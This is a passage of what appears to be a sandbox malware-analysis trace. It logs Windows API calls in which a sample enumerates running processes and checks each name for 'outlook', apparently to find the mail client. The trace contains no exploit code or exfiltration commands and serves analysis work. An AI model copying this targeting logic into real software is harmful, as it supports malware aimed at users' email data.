lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578300, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.229] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.229] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.229] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.230] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35785b8 [0098.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35785b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.230] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.230] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.230] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.232] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35784f8 [0098.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35784f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.232] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.232] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.232] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.233] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578660 [0098.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578660, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.233] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.233] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.234] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578618 [0098.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.234] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.235] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.235] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0098.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.236] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578588 [0098.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3578588, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0098.236] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0098.236] StrStrIA (lpFirst="spoolsv.exe", lpSrch="outlook") returned 0x0 [0098.236] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.559] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578510 [0098.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578510, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.559] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.560] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.560] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0098.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.561] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578498 [0098.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3578498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0098.562] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0098.562] StrStrIA (lpFirst="audiodg.exe", lpSrch="outlook") returned 0x0 [0098.562] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0098.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.563] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578528 [0098.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3578528, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0098.563] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0098.563] StrStrIA (lpFirst="sihost.exe", lpSrch="outlook") returned 0x0 [0098.563] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.564] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578450 [0098.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3578450, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.564] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.564] StrStrIA (lpFirst="svchost.exe", lpSrch="outlook") returned 0x0 [0098.564] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0098.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.566] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578480 [0098.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3578480, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0098.566] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0098.566] StrStrIA (lpFirst="taskhostw.exe", lpSrch="outlook") returned 0x0 [0098.566] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0098.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.567] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578540 [0098.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3578540, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0098.567] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0098.567] StrStrIA (lpFirst="explorer.exe", lpSrch="outlook") returned 0x0 [0098.567] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0098.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.568] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ad18 [0098.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357ad18, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0098.568] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0098.569] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="outlook") returned 0x0 [0098.569] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0098.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0098.570] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b438 [0098.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356b438, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0098.570] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0098.570] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="outlook") returned 0x0 [0098.570] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0098.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.571] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ae38 [0098.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357ae38, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0098.572] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0098.572] StrStrIA (lpFirst="Memory Compression", lpSrch="outlook") returned 0x0 [0098.572] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0098.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0098.573] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357af78 [0098.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357af78, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0098.573] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0098.573] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="outlook") returned 0x0 [0098.573] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0098.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.574] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578570 [0098.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3578570, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0098.574] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0098.574] StrStrIA (lpFirst="SearchUI.exe", lpSrch="outlook") returned 0x0 [0098.574] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0098.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0098.576] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357af38 [0098.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357af38, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0098.576] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0098.576] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="outlook") returned 0x0 [0098.576] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0098.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.577] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35784b0 [0098.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35784b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0098.577] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0098.577] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="outlook") returned 0x0 [0098.577] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0098.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.578] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578678 [0098.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3578678, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0098.579] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0098.579] StrStrIA (lpFirst="pending.exe", lpSrch="outlook") returned 0x0 [0098.579] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0098.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0098.580] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356bcd0 [0098.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356bcd0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0098.580] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0098.580] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="outlook") returned 0x0 [0098.580] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0098.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.581] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357aeb8 [0098.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357aeb8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0098.582] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0098.582] StrStrIA (lpFirst="swing prefer.exe", lpSrch="outlook") returned 0x0 [0098.582] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0098.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0098.583] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b9d8 [0098.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356b9d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0098.583] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0098.583] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="outlook") returned 0x0 [0098.583] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0098.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 